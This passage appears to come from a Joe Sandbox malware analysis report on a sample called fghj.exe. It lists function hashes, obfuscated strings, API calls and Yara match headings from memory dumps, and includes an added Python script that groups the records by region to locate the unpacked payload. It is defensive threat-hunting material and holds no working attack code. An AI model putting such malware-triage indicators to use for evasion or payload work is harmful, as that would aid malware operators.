                                                                                                                                                                                                                    • Instruction ID: a7c11f39ff90bd02b311f9c2985812ea76b651a7f3cfdbb08c5c443044891ff7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ce505b89c1af04ac6ad5407cb6a86e854819c669a549d688737e1f1a330426d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 578214746483409FE714CF24D885BABBBE2EBD6700FA4C8ACE5C597256DB31DC818B52
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: DH$I}$n$us$us
                                                                                                                                                                                                                    • API String ID: 0-1813928229
                                                                                                                                                                                                                    • Opcode ID: 96023bdf6c313b5c6d50006df859692ebe05b97524a4c309529f993aa9b99c64
                                                                                                                                                                                                                    • Instruction ID: 691a48b664d0943346ecfc47daa1d1b406132f9444dad9f4ed00c2430fedd113
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96023bdf6c313b5c6d50006df859692ebe05b97524a4c309529f993aa9b99c64
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5D14671A483408FC314DF64C881AABBFE1FBD1304F18896CE9D59B391DB789909CB92
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: >XVt$@A$hlZo$iUmZ
                                                                                                                                                                                                                    • API String ID: 0-436922151
                                                                                                                                                                                                                    • Opcode ID: 1a274ba9affa76d4e115d43027523d9b33005508ed0007c041ca63eacf175872
                                                                                                                                                                                                                    • Instruction ID: 760c2db47729effebb5ac763d85a49cc51a7897d5da81a801221a989f487ac68
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a274ba9affa76d4e115d43027523d9b33005508ed0007c041ca63eacf175872
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB814D7150C3E08BE3748B2698907AB7BD1DF96310F1949ADD4DD9B381DB758806C793
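The records above come from two different memory regions: the dump at Offset 003A0000 is marked "based on PE: true" (the mapped fghj.exe image, whose function uses resource and LoadLibrary/FreeLibrary APIs), while every dump at Offset 00B00000 is "based on PE: false", carries a "Yara matches" heading and yields only short, non-printable-looking strings. Separating the two is how an analyst locates the unpacked payload for further work. The script below is an added example written for this page, not Joe Sandbox tooling or output: it parses the record format shown here, groups unique functions by region, and checks that each Opcode ID matches its Opcode Fuzzy Hash (which holds for every complete record on this page). The sample text is constructed from three of the records above with their leading whitespace removed; nothing about the dump file name's trailing flag fields is decoded, since the report does not state their meaning.

```python
import re
from collections import defaultdict

# Constructed sample: three records copied from the listing above (leading
# whitespace removed); the report itself, not this string, is the ground truth.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
Similarity
• API ID: Resource$ErrorLast$FreeLibraryLoad$FindLockSizeof
• String ID:
• API String ID: 3462591719-0
• Opcode ID: 6cf6fd0791ec1306ffbc6ce5f2605202d11c2f0e9f84f15c5863f40c75164cca
• Instruction ID: 1a93b1474b3ea258502a6601af2158892d0b2449755efd833c7832079793335d
• Opcode Fuzzy Hash: 6cf6fd0791ec1306ffbc6ce5f2605202d11c2f0e9f84f15c5863f40c75164cca
• Instruction Fuzzy Hash: 3F61ACB5620204BBDF0AFBB6DC5BDAE3A7DEF5B340F004129F502DA192EE7599448660
Memory Dump Source
• Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
Yara matches
Similarity
• API ID:
• String ID: &0" $2)6 $=342$=Q^^$I2?8$Yz$aD4N$e$rmte$sD4N$wu~g
• API String ID: 0-1157038571
• Opcode ID: d9fd46ed380715bf220d02342fb719428f4c7fb6f61d62cf527223ce85d7dfa6
• Instruction ID: e5e359819ceef1da69ef5867643ba340f5fff9d3c1162ddc4f08d708d4cff9c0
• Opcode Fuzzy Hash: d9fd46ed380715bf220d02342fb719428f4c7fb6f61d62cf527223ce85d7dfa6
• Instruction Fuzzy Hash: D35225715083958FC721DF24D84076EBBE2EFD6310F0886ACE8E95B392DB359906C792
Memory Dump Source
• Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
Yara matches
Similarity
• API ID:
• String ID: >XVt$@A$hlZo$iUmZ
• API String ID: 0-436922151
• Opcode ID: 1a274ba9affa76d4e115d43027523d9b33005508ed0007c041ca63eacf175872
• Instruction ID: 760c2db47729effebb5ac763d85a49cc51a7897d5da81a801221a989f487ac68
• Opcode Fuzzy Hash: 1a274ba9affa76d4e115d43027523d9b33005508ed0007c041ca63eacf175872
• Instruction Fuzzy Hash: FB814D7150C3E08BE3748B2698907AB7BD1DF96310F1949ADD4DD9B381DB758806C793
"""

_FIELD_RE = re.compile(r"•\s*(?P<key>[^:]+):\s?(?P<value>.*)")
_SOURCE_RE = re.compile(r"(?P<dump>\S+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), "
                        r"based on PE: (?P<pe>true|false)")

def parse_records(text):
    """One dict per 'Memory Dump Source' block; '$'-separated ID fields become lists."""
    records, rec = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            records.append(rec := {"yara": False})
        elif rec is None:
            continue                      # text before the first record
        elif line == "Yara matches":
            rec["yara"] = True            # heading appears only on dumps with a Yara hit
        elif (m := _FIELD_RE.match(line)):
            key, value = m.group("key"), m.group("value")
            if key == "Source File" and (s := _SOURCE_RE.match(value)):
                rec.update(dump=s.group("dump"), offset=int(s.group("offset"), 16),
                           pe_backed=s.group("pe") == "true")
            elif key in ("API ID", "String ID"):
                rec[key] = value.split("$") if value else []
            elif key == "API String ID":  # "<api hash>-<string hash>"
                rec[key] = tuple(int(x) for x in value.split("-"))
            else:
                rec[key] = value          # Associated, Snapshot File, hashes, ...
    return records

def triage(records):
    """Group unique functions by region base; a 'based on PE: false' region with Yara hits is the unpacked payload."""
    regions = defaultdict(lambda: {"pe_backed": None, "functions": 0, "yara_hits": 0, "apis": set()})
    seen = set()
    for rec in records:
        oid = rec.get("Opcode ID")
        if oid and oid in seen:           # the same function can be listed twice
            continue
        seen.add(oid)
        r = regions[rec["offset"]]
        r["pe_backed"] = rec["pe_backed"]
        r["functions"] += 1
        r["yara_hits"] += int(rec["yara"])
        r["apis"].update(rec.get("API ID", []))
    return dict(regions)

def consistency_issues(records):
    """Flag records whose Opcode ID is not the same 64-hex-digit value as Opcode Fuzzy Hash."""
    out = []
    for rec in records:
        oid = rec.get("Opcode ID", "")
        if len(oid) != 64 or oid != rec.get("Opcode Fuzzy Hash"):
            out.append((oid, "Opcode ID missing, truncated or != Opcode Fuzzy Hash"))
    return out
```

Running `triage(parse_records(SAMPLE))` reports one function in the PE-backed region at 0x003A0000 and two in the non-PE-backed region at 0x00B00000, both with Yara hits; the Opcode IDs from the latter are the values to pivot on when hunting for the same unpacked code in other samples.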
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: >XVt$@A$hlZo$iUmZ
                                                                                                                                                                                                                    • API String ID: 0-436922151
                                                                                                                                                                                                                    • Opcode ID: f497bfd5aee755750b7c40d39889f52bd8f65bcd590ad5d197413e02625d0ece
                                                                                                                                                                                                                    • Instruction ID: b5caa8c4ae8822b1b07eb2fda73c1e49dc3a7184e2e1b8e6cb520f01b7ffa673
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f497bfd5aee755750b7c40d39889f52bd8f65bcd590ad5d197413e02625d0ece
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12814C7050C3E08BE3748B2698A07AB7BD1DF96310F1849ADD4DD9B381DB758806CB93
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: >XVt$@A$hlZo$iUmZ
                                                                                                                                                                                                                    • API String ID: 0-436922151
                                                                                                                                                                                                                    • Opcode ID: c48017bb1ba55d2966cd38a4871b451f0d6a31ec97ee146c3deefdb3d4b80fc2
                                                                                                                                                                                                                    • Instruction ID: 95fbad2e278e71772dda1bc7cc634febe7e1c3ee41e0e233e5b91694a2ac94f5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c48017bb1ba55d2966cd38a4871b451f0d6a31ec97ee146c3deefdb3d4b80fc2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF710A7150C3E08BE3748F2698907ABBBD2DF96210F1949ACD4D95B342DB7548068B93
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: C$zxyz$~&@v
                                                                                                                                                                                                                    • API String ID: 0-1637149356
                                                                                                                                                                                                                    • Opcode ID: e458bfb182dbd9059d0e79d735218f079b2678471523aa497ae56e4960a46c35
                                                                                                                                                                                                                    • Instruction ID: e56040e878917c5fd7a81ab4d5def99621169d48998850247a3a66544b753e43
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e458bfb182dbd9059d0e79d735218f079b2678471523aa497ae56e4960a46c35
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05422371A483518BD324CF28C88176BBBE1EFD5714F288A6DF9859B381DA34D805CB97
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ;${GA\;$7.
                                                                                                                                                                                                                    • API String ID: 0-3141673438
                                                                                                                                                                                                                    • Opcode ID: 2561060c7fd4c471339cdd8909a59a6559d67e96fd55faf9c3f182c0ae770455
                                                                                                                                                                                                                    • Instruction ID: a82775a278433f1505f4978e5e349cb05f3c59600c3c300486ee83b409e799e2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2561060c7fd4c471339cdd8909a59a6559d67e96fd55faf9c3f182c0ae770455
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72C10A72A0C3A14BC325CF25885035BFFE1EF96305F194AADE8D59B382D639C906C796
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: A&[8$E:;<$V*W,
                                                                                                                                                                                                                    • API String ID: 0-4134244070
                                                                                                                                                                                                                    • Opcode ID: 9130073f4b39250c945160ae7c79fdf3d476be8a8ea9366fd54c3a1bd9d2e7d0
                                                                                                                                                                                                                    • Instruction ID: d87b83b9d668bd3f773b821879dd8e3bcbb7e283cb6fe9a53ee8edea0fae8dd4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9130073f4b39250c945160ae7c79fdf3d476be8a8ea9366fd54c3a1bd9d2e7d0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E9134702083109BD724DF64DC92B6B77F5EF81B24F14899CF9898B291E778DA05CB62
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: M$UN$^
                                                                                                                                                                                                                    • API String ID: 0-3025785885
                                                                                                                                                                                                                    • Opcode ID: 6202ab286e219dd05dd8e0361549bc1ef4dc499cab8f8d907c14e67f8aaae663
                                                                                                                                                                                                                    • Instruction ID: 1eb10c04c9a4afbb17cdbdf022d9cea95c46934d2362b2ef8208681d86017b0d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6202ab286e219dd05dd8e0361549bc1ef4dc499cab8f8d907c14e67f8aaae663
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD91FE715447118FC724CF28C891AA3B7F2FF9A360B59C49DC4964FBA1EB35A882CB40
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 0$8
                                                                                                                                                                                                                    • API String ID: 0-46163386
                                                                                                                                                                                                                    • Opcode ID: 4192dcd53447e487a8f4a093151d40fb371583c5f2e25379ac25cebd27e4a0d7
                                                                                                                                                                                                                    • Instruction ID: c073f83c23c609589d28f8d675cb8063d291232c437932c2902afa6687c6825e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4192dcd53447e487a8f4a093151d40fb371583c5f2e25379ac25cebd27e4a0d7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E7223716083409FD714CF18C880BABBBE1EF98354F1489ADF9898B392D775D958CB92
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: {bcd$c
                                                                                                                                                                                                                    • API String ID: 0-3821666538
                                                                                                                                                                                                                    • Opcode ID: 8aa11a78d0e2622c538d7e039c09967632528a1ae3256386de57d5879407a74a
                                                                                                                                                                                                                    • Instruction ID: 737e88e8a6e7e01d9e2604dbd240e13fdabe654e5a905abbe88c5d02bdf88b9a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8aa11a78d0e2622c538d7e039c09967632528a1ae3256386de57d5879407a74a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A02CEB15493D08BD332CF2588907EBBFE1EBDA300F184AACD4D95B292D7758506CB96
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 003A67A1: FreeLibrary.KERNEL32(?,00000000,003A6947,0000018C,00000000,00000000,003A6A0D,?,?,?,00000000,003A225E,00000000,0000018C,00000010,00000010), ref: 003A67BB
                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(00000000,0000018C,00000000,00000000,003A6A0D,?,?,?,00000000,003A225E,00000000,0000018C,00000010,00000010,0000018C), ref: 003A6951
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000001), ref: 003A6963
                                                                                                                                                                                                                      • Part of subcall function 003A268F: ExitProcess.KERNEL32 ref: 003A2740
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressExitFreeLoadProcProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1239403935-0
                                                                                                                                                                                                                    • Opcode ID: 04ca42cd943e30c66789f24d64af61ed46dd2bd530b33c84cfd183fa6b92e8b4
                                                                                                                                                                                                                    • Instruction ID: 72baf54e652b39696ee1b0b9d7c6ea8187cddc06b8f2d9ec80f4af873dcbd677
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04ca42cd943e30c66789f24d64af61ed46dd2bd530b33c84cfd183fa6b92e8b4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 080192712603006BD626EB75CC97F6BB7DCDF86750F04891DF19A9B1D0CE79D9058A20
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 45$-/
                                                                                                                                                                                                                    • API String ID: 0-195032532
                                                                                                                                                                                                                    • Opcode ID: 6dc2b53c1c63793181e933c0dc0a9b2068da8d5bb93bc8943316a89247141794
                                                                                                                                                                                                                    • Instruction ID: bb700276fa8a1abeb35e9a735436b987120688b81b144dad5c3ef5fce04f9002
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6dc2b53c1c63793181e933c0dc0a9b2068da8d5bb93bc8943316a89247141794
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7C147B2A043208BD714DF24D892A77B7E5EF91710F1984ACE88A9B391E63CDE05C752
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: )$IEND
                                                                                                                                                                                                                    • API String ID: 0-707183367
                                                                                                                                                                                                                    • Opcode ID: 555cc7c1c2296d19f0d3b3819417252b77b8350260042f249ca5be385440b7a4
                                                                                                                                                                                                                    • Instruction ID: 63cd6762b54c539c7def149682f313a10ebe4c0da57f2028cf01d60a7d94b3f2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 555cc7c1c2296d19f0d3b3819417252b77b8350260042f249ca5be385440b7a4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BD19BB15087449FE720CF18C881B5BBBE4EB94344F14896DF9999B3C2D775E908CB92
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: /k?$3k?
                                                                                                                                                                                                                    • API String ID: 0-3999930788
                                                                                                                                                                                                                    • Opcode ID: 0843cfbe9e390bf993783db44ffd3dd139bbf432ce856de5fe3a4e3bf7717a86
                                                                                                                                                                                                                    • Instruction ID: 5982470e4519af2283809a95044c92f7553eb8a7977c20d30b3f55f283857c74
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0843cfbe9e390bf993783db44ffd3dd139bbf432ce856de5fe3a4e3bf7717a86
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58515C356083208FDB209F6D8C80A6BBBE1FB96714F369AACD6C0A7219D771DC01C785
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: st$(
                                                                                                                                                                                                                    • API String ID: 0-3235791767
                                                                                                                                                                                                                    • Opcode ID: 6dcb24c17ef77fba05aaf466c16c9998c004fe6cfb22230f4a772e8da64dd68a
                                                                                                                                                                                                                    • Instruction ID: b11053091e29d45683841ada1a3cefc0e5122cffa6ee9638ac4eff27ebaab7b4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6dcb24c17ef77fba05aaf466c16c9998c004fe6cfb22230f4a772e8da64dd68a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD5133776152008BC318CF29C8916AAB3E3EFC5314F59D66DE4968B3E1EB74E901CB45
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,003A56F5,00000000,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?,00000000), ref: 003A4529
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,0000005C,Flash,?,?,0000005C,Macromed,?,?,?,00000000), ref: 003A4530
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3859560861-0
                                                                                                                                                                                                                    • Opcode ID: 0b35939eda80e063b111fb37b0477d5669ebcfa76a2c82c46827f26785fb268a
                                                                                                                                                                                                                    • Instruction ID: 8018b6aad7e5b4b0391f76595aa2b8cbb5cd0209a739b65d924c11d88a233af7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b35939eda80e063b111fb37b0477d5669ebcfa76a2c82c46827f26785fb268a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5B00275555200EBDE42ABE09E0DF0A7F7DBB45742F005545F349C5160CA75C454DB11
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                    • API String ID: 0-2766056989
                                                                                                                                                                                                                    • Opcode ID: 7d58ce99e14cd4456ae23e5809613514da7f6838dea5dcaaa26db1aac14b0b8b
                                                                                                                                                                                                                    • Instruction ID: 9652789439c0ee3df54ef55fd4a62b0711ec139943d75736c8bfe88e043a9e53
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d58ce99e14cd4456ae23e5809613514da7f6838dea5dcaaa26db1aac14b0b8b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C72C530618B488FDB69DF28C8856B977E1FB98714F14466DE88BC7241DF34EA42DB81
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 003A8433
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                                                                                                    • Opcode ID: 1ead2702d2c871b70b828c374928a25ac9851d7000d29f187a61134c0772ee8a
• Instruction ID: c670f81e220510d90aaac2fbca36b1844ba47d49b548edfeb45fcd32191a59bb
• Opcode Fuzzy Hash: 1ead2702d2c871b70b828c374928a25ac9851d7000d29f187a61134c0772ee8a
• Instruction Fuzzy Hash: 8612F1379153218FC74BFFB5EC8712A3B6AEB93311B42862EE4029B572DF3855018A95
APIs
• GetModuleHandleW.KERNEL32(?,00000000,00000000,00000000,?,?,003A4337,PrefixCommandLine,?,?,?,?,?,?,000001D0,000001D0), ref: 003A7A1F
Memory Dump Source
• Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmp
